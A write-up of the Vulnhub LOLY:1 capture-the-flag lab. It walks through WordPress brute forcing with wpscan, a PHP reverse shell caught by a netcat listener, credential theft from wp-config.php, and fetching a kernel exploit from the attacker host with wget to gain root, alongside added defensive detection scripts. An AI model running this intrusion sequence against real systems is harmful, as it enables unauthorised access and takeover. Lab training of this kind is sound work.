Hello folks, in this article we are going to solve the Capture the Flag (CTF) challenge LOLY:1 from Vulnhub; the URL for this CTF is https://vulnhub.com/entry/loly-1,538/. This CTF is posted by the SunSCR Team and aimed at beginners, so let’s get started…
Table of Contents
Reconnaissance
· Netdiscover to find the machines on our network
· Nmap to detect open ports
Enumeration
· Dirb for directory listing and discovering the WordPress site
· Running wpscan to find vulnerabilities
· Running wpscan to brute force the password
Exploitation
· Uploading a PHP web shell
· Running the netcat listener
· Exploring the wp-config.php file
Privilege Escalation
· Searching Ubuntu related exploits
· Exploiting Ubuntu
Reconnaissance
We have to set up our lab first using a bridged network in either VMware or VirtualBox (this lab supports both). Then we discover the IP address of the vulnerable machine using netdiscover with the following command:
netdiscover -r 192.168.0.1/24
The IP address discovered by the above command is 192.168.0.180.
Now that we have the IP address of our vulnerable machine, it is time to scan it with nmap:
nmap -A 192.168.0.180
The screenshot below shows that port 80 is open and running an nginx server, which we will explore and enumerate further.
Enumeration
We will browse the site now to see how the interface looks and what is available there.
As we can see, the nginx server is running and a site is hosted on it, so we will now run dirb to find existing and/or hidden web objects:
dirb http://192.168.0.180
From the screenshot below we can see that this is a WordPress site, and we can also see the wp-admin path.
As we know, WordPress and its plugins are prone to vulnerabilities, so we will focus on this part to find any low hanging fruit.
Upon browsing the site, we observed that the page is not responding as it should, possibly because of domain name mapping. Hence we need to add an entry to the /etc/hosts file as per the screenshot below (mapping the site’s hostname loly.lc to 192.168.0.180). This entry will not only let the page load properly but will also help us when we run wpscan in the next step.
Now it’s time to run wpscan to find more vulnerabilities in this WordPress site, using the following command:
wpscan --url http://loly.lc/wordpress --enumerate u
The --enumerate u argument at the end of the command enumerates the login names of the users on the WordPress site.
After running wpscan we found the username, which is loly, as per the screenshot below.
Now, the next stage is to brute force the password for the user loly with the rockyou.txt wordlist shipped with Kali Linux, using the following wpscan command:
wpscan --url http://loly.lc/wordpress -U loly -P /usr/share/wordlists/rockyou.txt
Here -U accepts either a single username or a file of usernames.
Eureka!!! We found the password for loly as per the screenshot below.
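The wordlist run above leaves a very recognisable trace on the server side: a burst of POST requests to wp-login.php from one source address in the nginx access log. The following detection is an added example written for this article, not part of the original walkthrough or of wpscan; it parses combined-format access log lines and flags any source IP that sends a threshold number of login POSTs inside a sliding time window. The log lines, addresses and user-agent strings are constructed, and the threshold and window are arbitrary defaults.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the nginx "combined" access log format (the default log_format on many installs).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],   # drop any query string
        "status": int(m.group("status")),
        "ua": m.group("ua"),
    }


def find_login_bursts(lines, threshold=5, window_seconds=60):
    """Return {ip: peak_count} for source IPs that sent at least `threshold`
    POSTs to wp-login.php within any `window_seconds` sliding window.
    Lines are assumed to be in chronological order, as nginx writes them."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    flagged = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or not ev["path"].endswith("/wp-login.php"):
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:   # evict timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ev["ip"]] = max(flagged.get(ev["ip"], 0), len(q))
    return flagged


# Constructed sample log: one ordinary visitor (192.168.0.50, one normal login) and one
# host (192.168.0.147) firing six login POSTs in six seconds, as a wordlist run would.
SAMPLE_LOG = [
    '192.168.0.50 - - [04/Nov/2020:14:01:30 +0000] "GET /wordpress/ HTTP/1.1" 200 9123 "-" "Mozilla/5.0 (constructed)"',
    '192.168.0.50 - - [04/Nov/2020:14:01:45 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (constructed)"',
] + [
    f'192.168.0.147 - - [04/Nov/2020:14:02:0{sec} +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4521 "-" "constructed-scanner-ua"'
    for sec in range(6)
] + [
    '192.168.0.147 - - [04/Nov/2020:14:02:30 +0000] "GET /wordpress/wp-admin/ HTTP/1.1" 302 0 "-" "constructed-scanner-ua"',
]

if __name__ == "__main__":
    for ip, peak in find_login_bursts(SAMPLE_LOG).items():
        print(f"possible wp-login brute force from {ip}: {peak} POSTs within 60s")
```

On a real server the same logic runs over /var/log/nginx/access.log; a WordPress login that fails re-renders the form with status 200 while a successful one redirects with 302, so filtering on status 200 in addition to the path tightens the rule further. Rate limiting wp-login.php in nginx, or a fail2ban jail built on the same pattern, stops the run before the wordlist gets far.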
Exploitation
Here comes the exciting part, EXPLOITATION!!! It’s time to upload the PHP reverse shell by logging into the WordPress site with the loly/fernando credentials we discovered earlier.
Now, trigger the PHP reverse shell payload by browsing to it as per the screenshot below, but before that we have to start a netcat listener to receive the reverse connection, which is shown in the next screenshot.
As mentioned above, we create the netcat listener first with the command below to get the shell:
nc -lvp 1234
Now, further exploring the directory structure of our victim machine, we found the wp-config.php file, which will help us a lot in solving the rest of this CTF. By the way, wp-config.php is one of the core WordPress files and contains the database information: name, host (typically localhost), username and password.
As you can see, we managed to read the password lolyisabeautifulgirl by viewing the wp-config.php file.
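What makes the wp-config.php find so valuable here is not the database password itself but its reuse as the OS password of the loly account. The audit below is an added example for this article, not code from the walkthrough or from WordPress; it parses the define() entries of a wp-config.php, reports whether the file is readable by group or others, and flags a DB_PASSWORD that also appears in an inventory of other secrets. The sample configuration is constructed (the DB_NAME and DB_USER values are placeholders, only the password is the one found above), and the other_secrets inventory is a hypothetical input a defender would populate from their own records.

```python
import os
import re
import stat
import tempfile

# Matches define('KEY', 'value'); as written in a stock wp-config.php.
DEFINE_RE = re.compile(
    r"""define\(\s*['"](?P<key>[A-Z_]+)['"]\s*,\s*['"](?P<val>[^'"]*)['"]\s*\)"""
)


def parse_defines(text):
    """Return {KEY: value} for every define() in the given wp-config.php text."""
    return {m.group("key"): m.group("val") for m in DEFINE_RE.finditer(text)}


def audit_wp_config(path, other_secrets=None):
    """Return a list of finding strings for the wp-config.php at `path`.
    `other_secrets` maps a label (for example an OS account) to its password so
    the audit can flag reuse of the database password elsewhere."""
    findings = []
    mode = os.stat(path).st_mode
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"file is readable by group/others (mode {stat.S_IMODE(mode):04o})")
    with open(path, encoding="utf-8") as fh:
        cfg = parse_defines(fh.read())
    db_pass = cfg.get("DB_PASSWORD", "")
    if not db_pass:
        findings.append("DB_PASSWORD is empty")
    elif len(db_pass) < 16:
        findings.append("DB_PASSWORD is shorter than 16 characters")
    for label, secret in (other_secrets or {}).items():
        if secret and secret == db_pass:
            findings.append(f"DB_PASSWORD is reused as the password for '{label}'")
    return findings


# Constructed wp-config.php fragment; DB_NAME and DB_USER are placeholders.
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
"""


def demo(mode=0o644):
    """Write the sample config with the given mode into a temp dir and audit it,
    supplying a constructed secrets inventory in which the loly OS account
    has the same password as the database."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "wp-config.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_WP_CONFIG)
        os.chmod(path, mode)
        inventory = {"loly (OS account)": "lolyisabeautifulgirl"}   # constructed
        return audit_wp_config(path, other_secrets=inventory)


if __name__ == "__main__":
    for mode in (0o644, 0o600):
        print(f"mode {mode:04o}:", demo(mode) or ["no findings"])
```

Tightening the mode to 0600 (or 0640 owned by root with the web server's group) clears the first finding, but note its limit: the PHP web shell in this walkthrough already runs as the web server user, which must be able to read wp-config.php, so permissions alone do not protect the database password from a compromised site. The reuse finding is the one that actually decides this box, which is why the inventory check is the part worth keeping.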
cat /etc/passwd
Running the above command yields the username, which is our favorite, loly.
Privilege Escalation
Here comes the trickier part, PRIVILEGE ESCALATION. First we will log in as the user loly with the password we discovered earlier, lolyisabeautifulgirl, and then run the following command:
lsb_release -a
The lsb_release command displays LSB (Linux Standard Base) information about the Linux distribution, including the version number, release codename and distributor ID.
Next, we will run the uname command to learn the Linux kernel version and some other details, so that we have enough information about the system for privilege escalation.
uname -a
From the screenshot above we know that the kernel image version in use is 4.4.0 on Ubuntu, so our next step is to find exploits related to this version using the command below:
searchsploit ubuntu 4.4.0
The screenshot below shows the exploits available for this particular Linux version and the command we used to copy the exploit to our root directory.
We will run a Python web server to host the exploit copied earlier, using the command below (it serves the current directory on port 8000):
python -m SimpleHTTPServer
Now switch back to our victim machine and run the following command from the tmp folder to fetch the exploit hosted on our Kali machine:
wget http://192.168.0.147:8000/45010.c
Run the following command to compile the exploit we copied earlier:
gcc 45010.c -o shell
We will use the chmod command to make the file readable, writable and executable:
chmod 777 shell
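The three steps above leave a compiled, world-writable ELF binary sitting in /tmp, which is exactly the artefact a responder looks for after a suspected compromise. The check below is an added example written for this article, not code from the walkthrough; it walks a temp directory, identifies files by the ELF magic bytes rather than by name, and reports why each one stands out (executable, world-writable, recently modified). The directory it scans in demo() is constructed, and the "ELF" file it plants is only a header-sized stub, not a program.

```python
import os
import stat
import tempfile
import time

ELF_MAGIC = b"\x7fELF"


def is_elf(path):
    """True if the file begins with the ELF magic bytes."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:
        return False


def find_elf_in_tmp(root, max_age_seconds=24 * 3600, now=None):
    """Walk `root` (a temp directory such as /tmp) and return a sorted list of
    (path, reasons) for every regular ELF file found. Reasons record whether the
    file is executable, world-writable, or modified within `max_age_seconds`."""
    now = time.time() if now is None else now
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)            # lstat: never follow symlinks planted in /tmp
            if not stat.S_ISREG(st.st_mode) or not is_elf(path):
                continue
            reasons = []
            if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
                reasons.append("executable")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if now - st.st_mtime <= max_age_seconds:
                reasons.append("modified recently")
            hits.append((path, reasons))
    return sorted(hits)


def demo():
    """Build a constructed temp directory holding a stub ELF marked 0777 (as the
    walkthrough's chmod did), a text file and a non-executable stub ELF, then scan it.
    Returns [(basename, reasons)] so the result does not depend on the temp path."""
    with tempfile.TemporaryDirectory() as tmp:
        stub_elf = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 61   # constructed header stub, not runnable
        samples = {
            "shell": (stub_elf, 0o777),
            "notes.txt": (b"todo\n", 0o644),
            "blob.bin": (stub_elf, 0o644),
        }
        for name, (data, mode) in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "wb") as fh:
                fh.write(data)
            os.chmod(path, mode)
        return [(os.path.basename(p), r) for p, r in find_elf_in_tmp(tmp)]


if __name__ == "__main__":
    for name, reasons in demo():
        print(f"{name}: {', '.join(reasons)}")
```

Run against the real /tmp, /var/tmp and /dev/shm this is a quick triage step; as a preventive measure, mounting those directories noexec and not shipping gcc on a web server remove both the place to drop a binary and the means to build one there.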
The id command below reveals the real and effective user and group IDs, and we can see that we are running as root as per the screenshot below.
Now cd to the root folder and check whether a root.txt is available, which it is in our case. Using cat root.txt we can see our final flag as per the screenshot below.